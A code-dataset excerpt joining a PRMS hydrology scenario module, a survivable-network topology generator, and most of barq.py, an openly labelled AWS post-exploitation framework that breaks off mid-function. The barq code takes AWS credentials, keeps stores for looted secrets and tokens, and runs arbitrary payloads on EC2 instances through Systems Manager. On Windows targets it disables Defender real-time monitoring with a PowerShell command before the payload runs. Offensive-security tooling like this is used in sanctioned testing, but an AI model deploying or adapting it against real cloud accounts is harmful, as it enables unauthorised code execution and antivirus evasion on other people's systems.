'title': 'Scenario example',
'description': 'adjust tmin_lapse using sine wave function',
'start_datetime': '2018-09-01T19:20:21.723003',
'end_datetime': '2018-09-01T19:20:31.117004',
'mod_funs_dict': {
'tmin_lapse': 'def parab(arr):
return 4 + np.sin(np.linspace(0,2*np.pi,num=len(arr)))'
}
}
As shown the metadata retirieved the parameter modification function
as a string representation of the exact Python function(s) used for
modifying the user-defined parameter(s).
Note:
The main differentiator between :class:`Scenario` and
:class:`ScenarioSeries` is that ``Scenario`` is designed for modifying
one or more parameters of a **single** *parameters* file whereas
``ScenarioSeries`` is designed for modifying and tracking the
modification of one or more parameters in **multiple** PRMS
*parameters* files, therefore resulting in multiple PRMS simulations.
"""
def __init__(self, base_dir, scenario_dir,
title=None, description=None):
self.title = title
self.description = description
self.base_dir = base_dir
self.scenario_dir = scenario_dir
self.metadata = ScenarioMetadata(title=title, description=description)
self.__simulation_ready = False
def build(self, param_mod_funs=None):
"""
Take a user-defined dictionary with param names as keys and Python
functions as values, copy the original input files as given when
initializing a :class:`Scenario` instance to the ``simulation_dir``
then apply the functions in the user-defined dictionary to the
parameters there. The ``build`` method must be called before running
the ``Scenario`` (calling :func:`Scenario.run()` ).
Keyword Arguments:
param_mod_funs (dict): dictionary with parameter names as keys
and Python functions as values to apply to the names (key)
Returns:
None
Example:
see :class:`Scenario` for a full example.
Note:
If the ``scenario_dir`` that was assigned for the current
instance already exists, it will be overwritten when ``build``
is invoked.
"""
if isinstance(param_mod_funs, dict):
# create scenario_dir that will be used as Simulation input dir
if os.path.isdir(self.scenario_dir):
shutil.rmtree(self.scenario_dir)
os.makedirs(self.scenario_dir)
shutil.copy(
os.path.join(self.base_dir, 'control'), self.scenario_dir
)
shutil.copy(
os.path.join(self.base_dir, 'data'), self.scenario_dir
)
old_params_path = os.path.join(self.base_dir, 'parameters')
new_params_path = os.path.join(self.scenario_dir, 'parameters')
if not param_mod_funs:
shutil.copy(old_params_path, self.scenario_dir)
else:
modify_params(old_params_path, new_params_path, param_mod_funs)
param_mod_funs_metadata = {
param_name: inspect.getsource(param_mod_fun)
for param_name, param_mod_fun in param_mod_funs.items()
}
self.metadata['mod_funs_dict'] = param_mod_funs_metadata
self.simulation = Simulation(self.scenario_dir, self.scenario_dir)
else:
self.simulation = Simulation(self.scenario_dir)
self.__simulation_ready = True
def run(self, prms_exec='prms'):
"""
Run the PRMS simulation for a *built* ``Scenario`` instance.
Keyword Arguments:
prms_exec (str): name of PRMS executable on $PATH or path to
executable
Returns:
None
Examples:
see :class:`Scenario` for full example
Raises:
RuntimeError: if the :func:`Scenario.build` method has not yet
been called.
"""
if not self.__simulation_ready:
raise RuntimeError(
'Scenario has not yet been prepared: run build_scenario first'
)
self.metadata['start_datetime'] = datetime.now().isoformat()
self.simulation.run(prms_exec=prms_exec)
self.metadata['end_datetime'] = datetime.now().isoformat()
self.metadata.write(os.path.join(self.scenario_dir, 'metadata.json'))
class ScenarioMetadata:
def __init__(self, title=None, description=None, start_datetime=None,
end_datetime=None, mod_funs_dict=None):
self.metadata_dict = dict(title=title,
description=description,
start_datetime=start_datetime,
end_datetime=end_datetime,
mod_funs_dict=mod_funs_dict)
def __getitem__(self, key):
return self.metadata_dict[key]
def __setitem__(self, key, value):
self.metadata_dict[key] = value
def __repr__(self):
return self.metadata_dict.__repr__()
def write(self, output_path):
with open(output_path, 'w') as f:
f.write(json.dumps(self.metadata_dict, ensure_ascii=False,\
indent=4, sort_keys=True))
``` |
{
"source": "johnvon/column-generation-framework",
"score": 3
} |
#### File: examples/survivable-net/netgen.py
```python
import random
import os
import re
import math
import sys
#
# Convert a set to set of string
#
def set2char( F ) :
F1 = []
for fs in F :
fs1 = []
for s in fs :
fs1.append( set( [ str( x ) for x in s ] ) )
F1.append( fs1 )
return F1
#
# Add " to string
#
def primecover( s ) :
return "\"" + s + "\""
#
# compute number of color after removing S
#
def checkNumberColor( topo , S ) :
temptopo = [ x for x in topo if x not in S ]
# first set color of all nodes = 0
color = {}
for x in topo :
for v in x :
color[ v ] = 0
# paint node v with color c
def travel( v , c ) :
color[ v ] = c
for x in temptopo :
if v in x :
for u in x :
if color[ u ] == 0 :
travel( u , c )
# compute number of color
ncolor = 0
for x in topo :
for v in x :
if color[v] == 0 :
ncolor = ncolor + 1
travel( v , ncolor )
return ncolor
lstNode = []
lstEdge = []
logicdeg = {}
logictopo = []
capacity = {}
shortest = {}
mody = {}
F1 = set()
F2 = set()
F3 = set()
F4 = set()
FNODE = set()
def generate_logic( degree , genedge , ishalf ) :
global logicdeg , logictopo , lstNode , lstEdge , shortest
logicdeg = {}
logictopo = []
for v in lstNode :
logicdeg[ v ] = 0
random.seed()
# GENERATE BY DEGREE
if degree > 0 :
while ( 1 ) :
underdeg = [ v for v in lstNode if logicdeg[v] < degree ]
if not len( underdeg ):
break
# take two random variables from underdeg
v1 = random.choice( underdeg )
v2 = random.choice( underdeg )
if len( underdeg ) > 1 :
while v1 == v2 :
v2 = random.choice( underdeg )
else :
while v1 == v2 :
v2 = random.choice( lstNode )
# update degree
logicdeg[ v1 ] += 1
logicdeg[ v2 ] += 1
logictopo.append( [ v1 , v2 ] )
logictopo.append( [ v2 , v1 ] )
else :
# GENERATE BY EDGE
tmpNode = set()
while (2 * len( tmpNode )) < len( lstNode ) :
v = random.choice( lstNode )
tmpNode.add( v )
#print "- half node : " , tmpNode
ge = 0
while ge < genedge :
if not ishalf :
v1 = random.choice( lstNode )
v2 = random.choice( lstNode )
else :
v1 = random.choice( list(tmpNode) )
v2 = random.choice( list(tmpNode) )
if (v1 != v2) :
logictopo.append( [ v1 , v2 ] )
logictopo.append( [ v2 , v1 ] )
ge += 1
# update degree
logicdeg[ v1 ] += 1
logicdeg[ v2 ] += 1
# verify logic topology
needrerun = 0
for v in lstNode :
if logicdeg[ v ] == 2 :
print "node " , v , " has degree " , logicdeg[ v ]
needrerun = 1
if needrerun:
generate_logic( degree , genedge , ishalf )
#
# Reading topo information
#
def reading_data( basename ) :
global logicdeg , logictopo , lstNode , lstEdge , F1 , F2 , F3 , F4 , FNODE
lstNode = []
lstEdge = []
print "READ TOPO : " , basename
ffile = open( "./topo/" + basename + ".topo" )
tag = 0
edgename = 0
separator = "[\ |\n|\t|\r]+"
for line in ffile :
if ( re.match("TAG" , line ) ) :
item = re.split( separator , line )
tag = int(item[1])
# node
if ( re.match( "node" , line ) ) :
item = re.split( separator , line )
lstNode.append( item[1] )
# link
if ( re.match( "link" , line ) ) :
item = re.split( separator , line )
edgename += 1
if tag == 1 :
lstEdge.append( ( str(edgename) , item[3] , item[5] , item[7] ) )
if tag == 2 :
lstEdge.append( ( str(edgename) + 'a' , item[2] , item[3] , item[4] ) )
lstEdge.append( ( str(edgename) + 'b' , item[3] , item[2] , item[4] ) )
# get set of all undirect edge
F1 = set( )
F2 = set( )
F3 = set( )
F4 = set( )
FNODE = set ( )
# get set of all undirect edge
lstUedge = set( )
for edge in lstEdge :
lstUedge.add( frozenset( ( edge[1] , edge[2] )) )
# build single failure set
for e in lstUedge :
if checkNumberColor( lstUedge , set( [e] ) ) == 1 :
F1.add( frozenset([e]) )
# build single node failure set
for v in lstNode :
tempnodeset = set()
for e in lstUedge :
if v in e :
tempnodeset.add( e )
#print "number color = " , checkNumberColor( lstUedge , tempnodeset)
FNODE.add( frozenset( tempnodeset ) )
# build higher order failure set
for v in lstNode :
temp = set()
for e in lstUedge:
if v in e :
temp.add( e )
# build dual
for e1 in temp :
for e2 in temp :
if len( set( [e1,e2] ) ) == 2 :
if checkNumberColor( lstUedge , set( [e1,e2] ) ) == 1 :
F2.add( frozenset( [ e1 , e2 ] ) )
# build third
for e1 in temp :
for e2 in temp :
for e3 in temp :
if len( frozenset([e1,e2,e3]) )== 3 :
if checkNumberColor( lstUedge , frozenset( [e1,e2,e3] ) ) == 1 :
F3.add( frozenset( [ e1 , e2 , e3 ] ) )
# build fourth
for e1 in temp :
for e2 in temp :
for e3 in temp :
for e4 in temp :
if len( frozenset([ e1 , e2, e3 ,e4]) )== 4 :
if checkNumberColor( lstUedge , frozenset( [e1,e2,e3,e4] ) ) == 1 :
F4.add( frozenset( [ e1 , e2 , e3 , e4 ] ) )
print "number of edges : " , len( lstEdge )
print "number of nodes : " , len( lstNode )
print "number of single failure : " , len( F1 )
print "number of dual failure : " , len( F2 )
print "number of third failure : " , len( F3 )
print "number of fourth failure : " , len( F4 )
F1 = [ x for x in F1 ]
F2 = [ x for x in F2 ]
F3 = [ x for x in F3 ]
F4 = [ x for x in F4 ]
random.shuffle( F1 )
random.shuffle( F2 )
random.shuffle( F3 )
random.shuffle( F4 )
print "------------------------------------"
ffile.close()
#
# Writing basic information : node set + edge set + failure set
#
def write_basic( fnet , nloc , sce ) :
global logicdeg , logictopo , lstNode , lstEdge , shortest , mody , F1,F2,F3,F4 , FNODE
# write node set
fnet.write("nodeset = {\n" )
for nnode in lstNode :
fnet.write( primecover( nnode ) + ",\n" )
fnet.write("};\n")
# compute capacity
for e in lstEdge :
capacity[ e ] = 0
for x,y in logictopo[ 0 : nloc ] :
for e in shortest[ (x,y) ] :
capacity[ e ] += 1
# write edgeset
for e in lstEdge :
if mody[e] > 0 :
dv = 0.2 * capacity[e]
else :
dv = -0.2 * capacity[e]
newe = math.ceil( capacity[ e ] + dv )
if ( newe < 1 ) :
newe = 1
#print e , ":" , capacity[e ] , "=>" , newe
capacity[ e ] = newe
fnet.write("edgeset = {\n" )
for nedge in lstEdge :
fnet.write("< ")
for item in nedge[:-1] :
fnet.write( primecover( item ) + "," )
fnet.write( nedge[ -1 ] )
fnet.write( "," + str(capacity[ nedge ]) )
fnet.write(" >,\n")
fnet.write("};\n")
print "finish writing basic information"
# print all link failure
FSET = set();
if sce == 1 :
FSET = F1
if sce == 2 :
FSET = F1 + F2[ 0 : len(F2)/14 +1 ]
if sce == 3 :
FSET = F1 + F2[ 0 : len(F2)/14 +1 ] + F3[ 0 : len(F3)/14 + 1 ]
if sce == 4 :
FSET = F1 + F2[ 0 : len(F2)/10 +1 ] + F3[ 0 : len(F3)/10 + 1 ]
if sce == 5 :
FSET = F1 + F2[ 0 : len(F2)/10 +1 ] + F3[ 0 : len(F3)/10 + 1 ] + F4[ 0 : len(F4)/20 + 1 ]
if sce == 6 :
FSET = FNODE
FSET = set2char( FSET )
fnet.write("nfailure = " + str( len( FSET) ) + ";\n" )
fnet.write( "failureset = [ \n" )
for fs in FSET :
fnet.write( "{ " )
for edge in lstEdge :
for uedge in fs :
#print "check " , edge[1], edge[2] , " in " , uedge
if (( edge[1] in uedge ) and ( edge[2] in uedge ) ):
fnet.write( primecover( edge[0] ) + " ")
fnet.write( " },\n" )
fnet.write( "]; \n" )
print "finish writing failure"
#
# Writing logicset from 0 to nloc
#
def write_logic( fnet , nloc ) :
global logictopo
fnet.write("logicset = { \n" )
id = 0
for v1,v2 in logictopo[ 0 : nloc ] :
fnet.write("< " + str(id) + " , " + primecover( v1 ) + " , " + primecover( v2 ) + " , 1 >\n" )
id += 1
fnet.write("};\n" )
#
# Writing common information
#
def write_common( fnet ) :
# write common data
fcommon = open( "common.dat" )
cmlist = fcommon.readlines()
for li in cmlist:
fnet.write( li )
fcommon.close()
#
# Compute shortest path for artificial capacity constraints
#
def compute_shortest( ) :
global logicdeg , logictopo , lstNode , lstEdge , capacity , shortest , mody
shortest = {}
mody = {}
for e in lstEdge :
mody[ e ] = 0
while mody[e] == 0 :
mody[ e ] = random.randint( - 1 , 1 )
# generate capacity
for x , y in logictopo :
#print "shortest path : " , x , " => " , y
shortest[ (x,y) ] = []
dis = {}
pre = {}
notvisit = set()
for v in lstNode:
dis[ v ] = 100000
notvisit.add( v )
dis[ x ] = 0
pre[ x ] = x
consider = x
while consider != y :
notvisit.remove( consider )
for e in lstEdge :
if ( e[1] == consider ) :
if ( dis[ consider ] + 1 ) < dis[ e[2] ] :
dis[ e[2] ] = dis[ consider ] + 1
pre[ e[2] ] = e[1 ]
consider = y
for v in notvisit :
if dis[v ] < dis[ consider ] :
consider = v
consider = y
thelen = 0
while consider != x :
for e in lstEdge :
if ( e[1] == pre[consider] and e[2] == consider ) :
shortest[ ( x , y ) ].append( e )
thelen = thelen + 1
consider = pre[ consider ]
#
# generate topo
#
def generate_topo( basename , lstDegree , lstNoLogic , iter , ishalf , listSCE ):
global logicdeg , logictopo , lstNode , lstEdge
# read generate topo data
reading_data( basename )
# generate by degree
for degree in lstDegree :
generate_logic( degree , 0 , ishalf )
compute_shortest()
for sce in listSCE :
fnet = open( "./net/" + basename + "-s" + str(sce) + "-d" + str(degree) + "-" + str(iter) + ".net" , "w" )
write_basic( fnet , 1000000 , sce )
write_logic( fnet , 1000000 )
write_common( fnet )
fnet.close()
generate_logic( 0 , len( lstNode ) * len( lstNode ) , ishalf )
compute_shortest()
for nloc in lstNoLogic :
for sce in listSCE :
if not ishalf :
fnet = open( "./net/" + basename + "-s" + str(sce) + "-e" + str(nloc) + "-" + str(iter) + ".net" , "w" )
else :
fnet = open( "./net/" + basename + "-hs" + str(sce) + "-e" + str(nloc) + "-" + str(iter) + ".net" , "w" )
write_basic( fnet , 2 * nloc , sce )
write_logic( fnet , 2 * nloc )
write_common( fnet )
fnet.close()
if __name__ == "__main__" :
#print "delete old files "
#for ff in os.listdir("net" ) :
# file_path = os.path.join("net", ff )
# os.unlink( file_path )
print ""
print "GENERATE NETWORKS"
print ""
for filename in os.listdir( "topo" ):
basename,extension = filename.split(".")
if extension != "topo" :
continue
print ""
print "TOPO :" , basename , "\n"
for i in range( 100 ) :
if basename == "NSF" :
generate_topo( basename , [] , [ 10 , 18 ] , i , False , [1] )
if basename == "EURO" :
generate_topo( basename , [] , [ 25 ] , i , False , [1] )
if basename == "NJLATA" :
generate_topo( basename , [ ] , [ 14 , 16 ] , i , False , [1] )
#if basename == "test" :
# generate_topo( basename , [ 3 ] , [ 20 ] , i , False , [1,2,3,4,5,6] )
if basename == "24NET" :
generate_topo( basename , [ ] , [ 35 ] , i , False , [1] )
generate_topo( basename , [ ] , [ 20,30,40,50,60 ] , i , False , [5] )
``` |
{
"source": "JohnVonNeumann/barq",
"score": 2
} |
#### File: JohnVonNeumann/barq/barq.py
```python
import boto3, json
from clint.arguments import Args
from clint.textui import puts, colored, indent, prompt, validators
import time
from prettytable import PrettyTable
import string
import os
import random
import subprocess
import readline
import sys
import signal
import re
from threading import Event, Thread
import logging
from getpass import getpass
from pygments import highlight
from pygments.lexers.data import JsonLexer
from pygments.formatters.terminal import TerminalFormatter
#signing commit again
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
raw_input = input
else:
string_types = basestring,
def id_generator(size=10, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def set_session_region(region):
global my_aws_creds
mysession = None
try:
if my_aws_creds['aws_session_token'] == '':
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region)
else:
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region,aws_session_token=my_aws_creds['aws_session_token'])
return mysession
except:
return None
def color(string, color=None):
"""
Change text color for the Linux terminal. (Taken from Empire: https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py)
"""
attr = []
# bold
attr.append('1')
if color:
if color.lower() == "red":
attr.append('31')
elif color.lower() == "green":
attr.append('32')
elif color.lower() == "yellow":
attr.append('33')
elif color.lower() == "blue":
attr.append('34')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
else:
if string.strip().startswith("[!]"):
attr.append('31')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
elif string.strip().startswith("[+]"):
attr.append('32')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
elif string.strip().startswith("[..]"):
attr.append('33')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
elif string.strip().startswith("[*]"):
attr.append('34')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
else:
return string
def start():
"""
The start of the barq functionality.
:return: None
"""
signal.signal(signal.SIGINT, signal.default_int_handler)
args = Args()
puts(color(asciilogo,'yellow'))
puts(color("barq: The AWS post exploitation framework written by <NAME>","green"))
global loot_creds
global ec2instances
global menu_stack
global my_aws_creds
global secgroups
global command_invocations
global lambdafunctions
menu_stack = []
loot_creds = {'secrets':[],'tokens':[],'parameters':[]}
ec2instances = {'instances':[]}
lambdafunctions = {'functions':[]}
secgroups = {'groups':[]}
my_aws_creds = {}
command_invocations = {'commands':[]}
global logger
logger = logging.getLogger('log')
logger.setLevel(logging.ERROR)
logpath = 'log.log'
ch = logging.FileHandler(logpath)
ch.setFormatter(logging.Formatter('%(asctime)s: %(message)s'))
logger.addHandler(ch)
logger.error('calling start')
myargs = dict(args.grouped)
if '--help' in myargs or '-h' in myargs:
help = """
barq framework options:
-h --help - This menu
-k --keyid - The AWS access key id
-s --secretkey - The AWS secret access key. (Needs --keyid, mandatory)
-r --region - The default region to use. (Needs --keyid)
-t --token - The AWS session token to use. (Needs --keyid, optional)
"""
print (help)
exit(0)
if '--keyid' in myargs or '-k' in myargs:
try:
aws_access_key_id = myargs['--keyid'][0]
except:
aws_access_key_id = myargs['-k'][0]
if '--secretkey' not in myargs and '-s' not in myargs:
puts(color("[!] using --secretkey is mandatory with --keyid"))
exit()
try:
aws_secret_access_key = myargs['--secretkey'][0]
except:
aws_secret_access_key = myargs['-s'][0]
if '--region' not in myargs and '-r' not in myargs:
puts(color("[!] using --region is mandatory with --keyid"))
exit()
try:
region_name = myargs['--region'][0]
except:
region_name = myargs['-r'][0]
if '--token' in myargs or '-t' in myargs:
try:
aws_session_token = myargs['--token'][0]
except:
aws_session_token = myargs['-t'][0]
else:
aws_session_token = ''
set_aws_creds_inline(aws_access_key_id,aws_secret_access_key,region_name,aws_session_token)
menu_forward('main')
def menu_forward(menu):
"""
Go forward to a new menu (Push to menu stack)
:param menu: The menu to go to
:return: None
"""
global menu_stack
global logger
if menu == 'training':
menu_stack.append(menu)
training_loop()
elif menu == 'ec2instances':
menu_stack.append(menu)
instances_loop()
else:
logger.error('calling menu forward for main')
menu_stack.append('main')
main_loop()
def menu_backward():
"""
Go back to previous menu (Pull from menu stack)
:return: None
"""
global menu_stack
try:
current_menu = menu_stack.pop()
next_menu = menu_stack[-1]
if next_menu == 'main':
go_to_menu(next_menu)
elif next_menu == 'training':
go_to_menu(next_menu)
elif next_menu == 'ec2instances':
go_to_menu(next_menu)
except Exception as e:
print(e)
pass
def go_to_menu(menu):
"""
Go to a menu directly, bypassing the stack. This is used for functionality that involves interaction under a particular menu,
and therefore does not add a menu to the stack.
:param menu: menu to go to directly.
:return: None
"""
if menu == 'main':
main_loop()
elif menu == 'training':
training_loop()
elif menu == 'ec2instances':
instances_loop()
def handle_menu():
"""
Pop the top menu from the stack and go to it.
:return: None
"""
global menu_stack
try:
current_menu = menu_stack.pop()
if current_menu == 'main':
main_loop()
elif current_menu == 'ec2instances':
instances_loop()
elif current_menu == 'training':
training_loop()
else:
main_loop()
except Exception as e:
print(e)
main_loop()
def training_loop():
"""
The menu handler loop for the training menu. Reads commands and send them to the processor, otherwise shows the menu prompt.
:return: None
"""
try:
command = ''
while command == '':
try:
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(trainingcomplete)
command = raw_input('barq ' +color('training','yellow') + ' > ' )
except Exception as e:
print(e)
#command = prompt.query('aws sheller training > ', validators=[])
command = str(command)
process_training_command(command)
except KeyboardInterrupt as k:
print("CTRL C clicked in training")
menu_backward()
def disable_windows_defender():
"""
The powershell command to disable windows defender.
:return: Returns the powershell command to disable win defender.
"""
return "Set-MpPreference -DisableRealtimeMonitoring $true"
def enable_windows_defender():
"""
Enable Windows Defender Powershell command.
:return: Returns the powershell command to enable win defender again.
"""
return "Set-MpPreference -DisableRealtimeMonitoring $false"
def wait_for_command_invocation(ssmclient, commandid,instanceid):
"""
:param ssmclient: The ssm (Systems manager) client associated with the required region and account.
:param commandid: The id of the command to check invocation results for.
:param instanceid: The id of the instance on which the command was run.
:return: Returns a tuple of success state and AWS response json in full.
"""
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
puts(color('[..] Waiting for command to return.... This will take some time'))
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
puts(color('[!] ERROR: %s'%result['StandardErrorContent']))
return False, result
puts(color('[*] Status of the command is: %s'%result['Status']))
if result['Status'] == 'Success':
puts(color('[+] Success! The command executed successfully. Output is:'))
puts(color(result['StandardOutputContent'],'blue'))
return True, result
def wait_for_threaded_command_invocation( commandid,instanceid, region):
"""
A thread-ready function to wait for invocation for a command on an instance.
TODO: Make it thread-safe by using locks on the global variables.
:param commandid: The command that was run
:param instanceid: The instance on which the command was run.
:param region: The region for Systems Manager
:return: Returns a tuple of success state and AWS response json in full.
"""
global my_aws_creds
logger = logging.getLogger('log')
logger.error('inside wait_for_threaded_command_invocation for %s and commandid: %s' %( instanceid,commandid))
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'],
region_name=region,
aws_session_token=my_aws_creds['aws_session_token'])
ssmclient = mysession.client('ssm', region_name=region)
time.sleep(10)
logger.error('inside wait_for_threaded_command_invocation for %s and commandid: %s, before get_command_invocation a' % (instanceid, commandid))
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
logger.error(
'inside wait_for_threaded_command_invocation for %s and commandid: %s, after get_command_invocation a, status: %s' % (
instanceid, commandid,result['Status']))
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
logger.error(
'failure in wait_for_threaded_command_invocation for %s and commandid: %s, after get_command_invocation b, status: %s' % (
instanceid, commandid, result['Status']))
return False, result
if result['Status'] == 'Success':
logger.error(
'success in wait_for_threaded_command_invocation for %s and commandid: %s, after get_command_invocation b, status: %s' % (
instanceid, commandid, result['Status']))
return True, result
def run_linux_command(ssmclient, instanceid, action, payload):
"""
Run a Systems Manager command on a running Linux instance.
:param ssmclient: Systems Manager client for the required region.
:param instanceid: id of target instance
:param action: Action to be run (AWS calls it DocumentName, here it's running a bash script)
:param payload: The actual payload to be executed on the target instance.
:return: returns status of execution.
"""
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
return success
def run_threaded_linux_command(mysession, target, action, payload):
"""
Thread-enabled function to run a Systems Manager command on a running Linux instance.
TODO: Make it thread-safe by using locks on global variables.
:param mysession: The established boto3 session for the target region
:param target: Target EC2 instance
:param action: Action to be run (AWS calls it DocumentName, here it's running a bash script)
:param payload: The actual payload to be executed on the target instance.
:return: None
"""
global my_aws_creds
global command_invocations
logger = logging.getLogger('log')
logger.error('inside run_threaded_linux_command for %s' %target['id'])
commandid = ''
result = {}
instanceid = target['id']
last_error = ''
try:
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'], region_name=target['region'],
aws_session_token=my_aws_creds['aws_session_token'])
ssmclient = mysession.client('ssm',region_name=target['region'])
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
commandid = response['Command']['CommandId']
logger.error('calling run_threaded_linux_command for %s and command: %s' %(target['id'],commandid))
command = {'id':commandid}
command['instanceid'] = instanceid
command['state'] = 'requested'
command['platform'] = 'linux'
command['region'] = target['region']
command_invocations['commands'].append(command)
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
except Exception as e:
logger.error(e)
last_error = str(e)
pass
logger.error('calling run_threaded_linux_command for %s and command: %s ' % (target['id'], commandid))
if 'Status' not in result:
logger.error('run_threaded_linux_command for %s and command: %s failed with error: %s' % (target['id'], commandid, last_error))
return
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
logger.error('run_threaded_linux_command for %s and command: %s failed with error: %s' % (target['id'], commandid, result['StandardErrorContent']))
commandx['state'] = 'failed'
commandx['error'] = result['StandardErrorContent']
command_invocations['commands'][index] = commandx
return False
if result['Status'] == 'Success':
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
logger.error('run_threaded_linux_command for %s and command: %s succeeded with output: %s' % (target['id'], commandid, result['StandardOutputContent']))
commandx['state'] = 'success'
commandx['output'] = result['StandardOutputContent']
command_invocations['commands'][index] = commandx
def run_threaded_windows_command(mysession, target, action, payload, disableav):
"""
Thread-enabled function to run a Systems Manager command on a running Windows instance.
It actually calls three commands: Disable windows defender, run the payload, then enable Windows Defender.
TODO: Make it thread-safe by using locks on global variables.
:param mysession: The established boto3 session for the target region
:param target: Target EC2 instance
:param action: Action to be run (AWS calls it DocumentName, here it's running a powershell script)
:param payload: The actual payload to be executed on the target instance.
:return: None
"""
global my_aws_creds
global command_invocations
logger = logging.getLogger('log')
response = {}
commandid = ''
logger.error("inside run_threaded_windows_command for %s" % target['id'])
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'],
region_name=target['region'],
aws_session_token=my_aws_creds['aws_session_token'])
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'],'ssmclient'))
ssmclient = mysession.client('ssm',region_name=target['region'])
instanceid = target['id']
#stage1 disable windows defender.
if disableav:
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'disable_windows_defender'))
try:
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[disable_windows_defender()]})
commandid = response['Command']['CommandId']
except Exception as e:
logger.error(e)
return False
#############
time.sleep(10)
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'get_command_invocation 1'))
try:
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
except:
pass
#############
success, result = wait_for_threaded_command_invocation(commandid,instanceid, target['region'])
logger.error("inside run_threaded_windows_command for %s, after line: %s" % (target['id'], 'wait_for_threaded_command_invocation 1'))
logger.error("success equals: %s" %success)
if not success:
logger.error('aborting commands for id %s' %target['id'])
return False
#stage2 run payload
time.sleep(3)
logger.error(
"inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'windows payload'))
try:
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
except Exception as e:
logger.error("inside run_threaded_windows_command for instance %s, returning error: %s" %(target['id'],str(e)))
return False
commandid = response['Command']['CommandId']
#################
command = {'id':commandid}
command['instanceid'] = instanceid
command['state'] = 'requested'
command['platform'] = 'windows'
command['region'] = target['region']
command_invocations['commands'].append(command)
time.sleep(10)
logger.error("inside run_threaded_windows_command for %s, before line: %s" % (target['id'], 'get_command_invocation 2'))
try:
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
except:
pass
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
logger.error("failure running payload in run_threaded_windows_command for %s, commandid: %s" % (target['id'], commandid))
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
commandx['state'] = 'failed'
commandx['error'] = result['StandardErrorContent']
command_invocations['commands'][index] = commandx
success = False
break
if result['Status'] == 'Success':
logger.error(
"success running payload in run_threaded_windows_command for %s. commandid: %s" % (target['id'], commandid))
for index, commandx in enumerate(command_invocations['commands']):
if commandx['id'] == commandid:
commandx['state'] = 'success'
commandx['output'] = result['StandardOutputContent']
command_invocations['commands'][index] = commandx
success = True
break
#################
if not success:
logger.error("inside run_threaded_windows_command for %s, failed in running payload" % (target['id']))
#stage3 enable windows defender.
if disableav:
time.sleep(30)
logger.error("inside run_threaded_windows_command for %s, before enable_windows_defender" % (target['id']))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[enable_windows_defender()]})
commandid = response['Command']['CommandId']
success, result = wait_for_threaded_command_invocation(commandid,instanceid,target['region'])
logger.error("inside run_threaded_windows_command for %s, after enable_windows_defender, success: %s" % (target['id'], success))
if not success:
return False
return True
def run_windows_command(ssmclient, instanceid,action,payload, disableav):
"""
Run a Systems Manager command on a running Windows instance.
It actually calls three commands: Disable windows defender, run the payload, then enable Windows Defender.
:param ssmclient: The Systems Manager client for the target region
:param instanceid: Target EC2 instance id
:param action: Action to be run (AWS calls it DocumentName, here it's running a powershell script)
:param payload: The actual payload to be executed on the target instance.
:return: status of execution
"""
time.sleep(3)
#stage1 disable windows defender.
if disableav:
